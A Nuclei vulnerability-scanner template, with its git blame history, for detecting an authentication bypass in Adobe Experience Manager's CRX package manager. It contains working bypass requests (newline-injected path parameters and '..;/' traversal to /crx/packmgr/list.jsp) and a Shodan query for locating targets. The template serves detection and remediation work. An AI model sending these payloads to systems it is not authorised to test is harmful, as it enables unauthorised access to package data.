nuclei-templates/http/misconfiguration/aem/aem-crx-bypass.yaml

id: aem-crx-bypass

info:
  name: AEM Package Manager - Authentication Bypass
  author: dhiyaneshDK
  description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
  severity: critical
  remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
  reference:
    - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
  metadata:
    max-request: 2
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,adobe

http:
  - raw:
      - |
        GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Accept-Encoding: gzip, deflate

      - |
        GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'buildCount'
          - 'downloadName'
          - 'acHandling'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/22
Create aem-crx-bypass.yaml 2021-06-28 14:50:58 +00:00			`id: aem-crx-bypass`

Update aem-crx-bypass.yaml 2021-06-28 14:53:11 +00:00			`info:`
Dashboard Content Enhancements (#4238) Dashboard Content Enhancements 2022-04-25 14:35:07 +00:00			`name: AEM Package Manager - Authentication Bypass`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`author: dhiyaneshDK`
Dashboard Content Enhancements (#4238) Dashboard Content Enhancements 2022-04-25 14:35:07 +00:00			`description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.`
Create aem-crx-bypass.yaml 2021-06-28 14:50:58 +00:00			`severity: critical`
Dashboard Content Enhancements (#4238) Dashboard Content Enhancements 2022-04-25 14:35:07 +00:00			`remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/`
Update aem-crx-bypass.yaml 2022-07-26 03:37:51 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 2`
Update aem-crx-bypass.yaml 2022-07-26 03:37:51 +00:00			`shodan-query: http.component:"Adobe Experience Manager"`
Dashboard Content Enhancements (#4238) Dashboard Content Enhancements 2022-04-25 14:35:07 +00:00			`tags: aem,adobe`
Create aem-crx-bypass.yaml 2021-06-28 14:50:58 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create aem-crx-bypass.yaml 2021-06-28 14:50:58 +00:00			`- raw:`
			`- \|`
Update aem-crx-bypass.yaml 2021-07-01 16:53:08 +00:00			`GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1`
Create aem-crx-bypass.yaml 2021-06-28 14:50:58 +00:00			`Host: {{Hostname}}`
			`Referer: {{BaseURL}}`
			`Accept-Encoding: gzip, deflate`
Added more strict matchers 2021-06-28 15:14:24 +00:00
Update aem-crx-bypass.yaml 2021-07-01 16:53:08 +00:00			`- \|`
			`GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1`
			`Host: {{Hostname}}`
			`Referer: {{BaseURL}}`
			`Accept-Encoding: gzip, deflate`
minor updates 2021-07-03 19:52:08 +00:00
Added more strict matchers 2021-06-28 15:14:24 +00:00			`matchers-condition: and`
Create aem-crx-bypass.yaml 2021-06-28 14:50:58 +00:00			`matchers:`
			`- type: word`
Added more strict matchers 2021-06-28 15:14:24 +00:00			`part: body`
Fixing errors in templates Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-27 07:43:24 +00:00			`words:`
Update aem-crx-bypass.yaml 2021-07-01 16:53:08 +00:00			`- 'buildCount'`
			`- 'downloadName'`
			`- 'acHandling'`
Added more strict matchers 2021-06-28 15:14:24 +00:00			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- 'application/json'`

			`- type: status`
			`status:`
Update aem-crx-bypass.yaml 2021-07-01 16:53:08 +00:00			`- 200`
Dashboard Content Enhancements (#4238) Dashboard Content Enhancements 2022-04-25 14:35:07 +00:00
			`# Enhanced by mp on 2022/04/22`